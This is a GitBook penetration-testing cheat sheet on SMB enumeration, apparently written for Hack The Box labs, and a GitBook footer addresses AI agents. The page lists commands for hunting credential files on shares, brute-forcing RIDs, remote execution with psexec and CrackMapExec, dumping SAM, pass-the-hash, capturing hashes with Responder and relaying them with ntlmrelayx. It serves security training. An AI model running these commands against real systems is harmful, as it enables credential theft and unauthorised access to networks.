> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration.md). # \[139,445] SMB Enumeration **How to interact with SMB - GUI** we can press `[WINKEY] + [R]` to open the Run dialog box and type the file share location, e.g.: `\\192.168.220.129\Finance\` ⚠️ \*\*Note:\*\* Once you executed CrackMapExec If the\`--exec-method\` is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the \`--exec-method\` smbexec. ```bash #List shared Folder C:\htb> dir \\192.168.220.129\Finance\ PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\ #Search for a specific word in the filename. C:\htb>dir n:\*cred* /s /b C:\htb>dir n:\*secret* /s /b PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred* #Search for a specific word within the content of the files. c:\htb> findstr /s /i cred n:\*.* PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred #Download Files smb: \> get file.txt #Download recursive mode smb: \Path\to\folder\> prompt off smb: \Path\to\folder\> recurse true smb: \Path\to\folder\> mget #Execute commands without interrupt the connections smb: \> ! # See who, from which host, and which share the client is connected. smb: \> smbstatus #------------Windows------------ #Mount shared folder C:\htb> net use n: \\192.168.220.129\Finance #/user:plaintext Password123 PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" #Mount SMB with creds PS C:\htb> $username = 'intrusionz3r0' PS C:\htb> $password = 'Password123' PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred #------------Linux------------ #sudo apt install cifs-utils. Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance #intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile **CredentialFile:** username=plaintext password=Password123 domain=. #----------------------------- #Enmueration usign SMBClient Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128 intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon" # Auth by kerberos #Export KRB5CCNAME=.ccache Intrusionz3r0X@htb[/htb]$ impacket-smbclient /: -k #Nmap Scan Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445 #Brute Forcing User RIDs Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128 #Enumeration using SMBmap Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null" Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt" Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" #Enumeration using CrackMapExec (targetting a non-domain joined computer use: --local-auth) Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p '' Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p '' #Enumeration using enum4linux Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C #Execute commands #Note: If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec. Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17 Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec #Enumerate users Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users #Enumerate the logged on users through the network Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users #Extract SAM database Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam #Pass the hash Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE #Capture users' NetNTLM v1/v2 hashes. Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33 Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt #If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx. #First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf). Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '' ``` **Bruteforce** ```powershell #Bruteforce (Metasploit) use auxiliary/scanner/smb/smb_login ``` ### SMB **Enumeration using RPCclient.** ```bash Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128 #Brute Forcing User RIDs Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128 ``` | **Query** | **Description** | | ------------------------- | ------------------------------------------------------------------ | | `srvinfo` | Server information. | | `enumdomains` | Enumerate all domains that are deployed in the network. | | `querydominfo` | Provides domain, server, and user information of deployed domains. | | `netshareenumall` | Enumerates all available shares. | | `netsharegetinfo ` | Provides information about a specific share. | | `enumdomusers` | Enumerates all domain users. | | `queryuser ` | Provides information about a specific user. | | `querygroup ` | Provides information about a specific group. | --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.